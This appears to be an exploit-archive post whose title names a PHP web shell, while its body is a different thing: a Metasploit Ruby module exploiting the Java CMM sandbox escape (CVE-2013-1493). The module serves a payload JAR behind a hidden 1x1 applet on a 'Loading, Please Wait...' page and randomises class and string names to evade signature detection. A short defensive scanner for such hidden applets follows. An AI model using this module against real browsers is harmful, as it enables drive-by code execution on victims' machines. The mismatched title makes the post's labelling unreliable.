STUNSHELL PHP Web Shell Remote Code Execution

Posted 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped with the framework and give
  # the entry class a random name so the served JAR does not carry a fixed
  # "Init.class" signature.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Route requests: the ".jar" URI serves the applet plus payload, the
  # directory URI serves the landing page, anything else is redirected there.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename the stock "metasploit"/"Payload" strings in entry names and
      # bytes so the JAR does not match simple static signatures.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Landing page: a 1x1 applet whose archive name is random and whose code
  # attribute is the randomised entry class from setup.
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end
end
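The landing page above is what a defender actually sees on the wire: a 1x1 applet, a randomly named .jar and a randomly named entry class. The following scanner is an added example (not part of the original post or of the Metasploit Framework) that picks such hidden applets out of an HTML response using only the Ruby standard library. The two sample pages are constructed for the example; the first mirrors the output of generate_html with made-up random names, the second is an ordinary visible applet that should not be reported. The attribute parsing is a deliberately small regex, not a full HTML parser.

```ruby
# Added example: flag <applet> tags shaped like the exploit landing page
# (explicitly hidden dimensions, loading a .jar). Stdlib only.
require 'cgi'

# Attribute list of a tag: name="v", name='v' or name=v (any order).
ATTR_RE   = /([A-Za-z_:][-\w:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/
APPLET_RE = /<applet\b([^>]*)>/i

def parse_attrs(tag_body)
  attrs = {}
  tag_body.scan(ATTR_RE) do |name, dq, sq, bare|
    attrs[name.downcase] = CGI.unescapeHTML(dq || sq || bare || '')
  end
  attrs
end

# Only an explicit numeric size of 1 or less (0, 1, 1px, negatives) counts as
# hidden; a missing or non-numeric dimension is treated as visible so that
# a sloppy but legitimate page is not reported.
def hidden_dimension?(value)
  return false if value.nil?
  return false unless value.strip =~ /\A-?\d+(px)?\z/i
  value.to_i <= 1
end

# Returns one finding per <applet> with hidden width AND height:
#   { archive:, code:, width:, height:, jar: true/false }
def suspicious_applets(html)
  findings = []
  html.scan(APPLET_RE).each do |(attr_body)|
    a = parse_attrs(attr_body)
    next unless hidden_dimension?(a['width']) && hidden_dimension?(a['height'])
    findings << {
      archive: a['archive'],
      code:    a['code'],
      width:   a['width'],
      height:  a['height'],
      jar:     a['archive'].to_s.downcase.end_with?('.jar')
    }
  end
  findings
end

# Constructed sample: the shape generate_html produces, with made-up names.
SAMPLE_EXPLOIT_PAGE = <<~HTML
  <html><head><title>Loading, Please Wait...</title></head>
  <body><center><p>Loading, Please Wait...</p></center>
  <applet archive="kQwzLpXb.jar" code="Vnqe.class" width="1" height="1"></applet></body></html>
HTML

# Constructed sample: a normal, visible applet with unquoted dimensions.
SAMPLE_BENIGN_PAGE = <<~HTML
  <html><body>
  <applet code='Clock.class' archive='clock.jar' width=300 height=200>Java required</applet>
  </body></html>
HTML

if __FILE__ == $0
  { 'exploit-like' => SAMPLE_EXPLOIT_PAGE, 'benign' => SAMPLE_BENIGN_PAGE }.each do |label, page|
    hits = suspicious_applets(page)
    puts "#{label}: #{hits.empty? ? 'no hidden applets' : hits.inspect}"
  end
end
```

Run it on a saved response body or pipe a proxy capture through it; the check keys on the hidden dimensions rather than on any class or archive name, which is the point, since the module randomises both names on every request.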